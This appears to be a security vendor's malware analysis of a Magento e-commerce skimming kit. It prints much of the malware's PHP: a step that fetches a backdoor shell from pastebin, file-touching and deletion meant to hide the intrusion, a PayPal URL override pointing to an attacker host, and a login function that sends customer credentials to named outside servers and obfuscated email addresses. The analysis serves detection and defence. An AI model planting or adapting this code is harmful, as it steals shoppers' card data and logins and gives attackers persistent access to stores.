Hackers are increasingly exploiting an Downloader with connect install package upload vulnerability to steal payment card information from e-commerce websites that use Magento, the most popular e-commerce platform owned by eBay.
Magento Auto Logger & Patcher
First this malware script try download patcher.zip
### Start Patching ###
/* Download */
executebin('curl -O '.$linkpatch);
/* Extract */
if (file_exists($namepatch)) {
echo "<br/>[+] $namepatch DOWNLOADED!";
} else {
echo "<br/><font color=red>[!] $namepatch NOT FOUND!</font>";
$backdoor = file_get_contents("http://pastebin.com/raw/[SECRET]");
$backdoor_f = fopen($dir."/js/backup.php", "w");
fwrite($backdoor_f, $backdoor);
fclose($backdoor_f);
echo "<br/>[+] Backdoor UPLOADED!";
}
@chmod($dir."/downloader/", 0777);
@unlink($dir."/downloader/index.php");
@unlink($dir."/downloader/backup.php");
executebin('unzip '.$namepatch);
If it fail it download PHP Command Shell to remote access from pastebin.
Logger Creator
### Logger Creator ###
$dir = $_SERVER['DOCUMENT_ROOT'];
$b64 = "base"."64"."_"."de"."code";
$path = '/app/code/core/Mage';
$link = $b64('[SECRET]');
$path_a = $dir.$path.'/Payment/Model/Method/';
$name_a = 'Cc.php';
$file_a = 'Abstract.php';
$link_a = $link.'[SECRET]';
patch($path_a,$name_a,$file_a,$link_a);
echo "<br/>[+] Card Logger DONE!";
.
.
echo "<br/>[+] Customer Logger DONE!";
.
.
echo "<br/>[+] Admin Logger DONE!";
.
.
if($size_e == $size_d) {
patch($path_d,$name_d,$file_d,$link_d);
echo "<br/>[+] PayPal Direct Scam DONE!";
} elseif($size_e == '4096') {
patch($path_d,$name_d,$file_d,$link_e);
echo "<br/>[+] PayPal Direct Scam DONE!";
} else {
echo "<br/><font color=red>[!] PayPal Direct Scam FAILED / ".$size_e."</font>";
}
Patch ShopLift
Then this try disable old Magento ShopLift vulnerability – remote code execution (RCE).
/* Patch ShopLift */ @unlink($dir."/app/code/core/Mage/Adminhtml/controllers/Cms/WysiwygController.php"); echo "<br/>[+] ShopLift PATCHED!";
Touching Files
After that it thouching almost all files to trying hide itself what files are modified:
echo "<br/>[+] Touching Files";
executebin('touch -r cron.sh app/');
executebin('touch -r app/locale/ app/code/');
.
.
.
executebin('touch -r js/calendar/calendar.js js/calendar/calendar.php');
executebin('touch -r cron.sh xml.php');
Deleting and Cleaning
Again it try remove itself to hiding
/* Delete */
executebin('rm -rf '.$namepatch);
if (file_exists($namepatch)) {
echo "<br/><font color=red>[!] $namepatch FOUND!</font>";
} else {
echo "<br/>[+] $namepatch DELETED!";
}
Paypal Model/Config.php
This stealing your payment information:
/**
* PayPal web URL generic getter
*
* @param array $params
* @return string
*/
public function getPaypalUrl(array $params = array())
{
$evil_destination = "http://socialplanners.com.mx/scammers/";
$ip_korban = $_SERVER['REMOTE_ADDR'];
$situs = $evil_destination."victims.txt";
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $situs);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_TIMEOUT,30);
curl_setopt($ch, CURLOPT_POST, 1);
$preg_view = curl_exec($ch);
curl_close($ch);
if(preg_match("#".$ip_korban."#", $preg_view)) {
return sprintf('https://www.%spaypal.com/cgi-bin/webscr%s',
$this->sandboxFlag ? 'sandbox.' : '',
$params ? '?' . http_build_query($params) : ''
);
} else {
$situs = $evil_destination."url.txt";
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $situs);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_TIMEOUT,30);
curl_setopt($ch, CURLOPT_POST, 1);
$paypal_fake = curl_exec($ch);
curl_close($ch);
return sprintf($paypal_fake,
$this->sandboxFlag ? 'sandbox.' : '',
$params ? '?' . http_build_query($params) : ''
);
}
}
Customer/Model/Session.php
This module steal user login data and forward them hackers gmail.com accounts:
email: kosowar8@gmail.com
email: 1v4n.1v4n4usqu1@gmail.com
/**
* Customer authorization
*
* @param string $username
* @param string $password
* @return bool
*/
public function login($username, $password)
{
/** @var $customer Mage_Customer_Model_Customer */
$customer = Mage::getModel('customer/customer')
->setWebsiteId(Mage::app()->getStore()->getWebsiteId());
if ($customer->authenticate($username, $password)) {
$srv = $_SERVER['HTTP_HOST'];
$ips = $_SERVER['REMOTE_ADDR'];
$uag = $_SERVER['HTTP_USER_AGENT'];
$getip = 'http://ip-api.com/json/' . $ips;
$curl = curl_init();
curl_setopt($curl, CURLOPT_URL, $getip);
curl_setopt($curl, CURLOPT_RETURNTRANSFER, true);
curl_setopt($curl, CURLOPT_FOLLOWLOCATION, true);
$content = curl_exec($curl); curl_close($curl);
$details = json_decode($content);
$country_codes = $details->countryCode;
if(empty($country_codes)) { $country_code = "XX"; } else { $country_code = $country_codes; }
$country_name = $details->country;
$chksrv = "http://socialplanners.com.mx/mail_chk/";
$chkmail = file_get_contents($chksrv."?e=$username&p=$password");
if($chkmail == "") { $mailchk = "Unknown"; } else { $mailchk = $chkmail; }
$chkvalid = file_get_contents($chksrv."valid.php?email=$username&pass=$password");
if($chkvalid == "") { $ppchk = "Unknown"; } else { $ppchk = $chkvalid; }
$id = "ba"."se"."64"."_"."de"."co"."de";
$db = "ma"."il";
$key = $id("a29zb3dhcjhAZ21haWwuY29tLDF2NG4uMXY0bjR1c3F1MUBnbWFpbC5jb20=");
$auth = "Account : ".$username."|".$password."\nInfo : ".$ppchk." PayPal - ".$mailchk." Email\n\nIP Info : ".$ips." | ".$country_name." On ".date('r')."\nBrowser : ".$uag."\nSite : ".$srv."";
$subjk = "".$ppchk." PayPal - ".$mailchk." Email [".$srv." - ".$ips."]";
$headr = "From: ".$country_code." User <".$username.">";
$db($key, $subjk, $auth, $headr);
$this->setCustomerAsLoggedIn($customer);
$this->renewSession();
return true;
}
return false;
}
Final words
Websites that using Malware Expert – ModSecurity rules are protected against this threat.
Use Malware Expert – Signatures detect these malware files for FREE!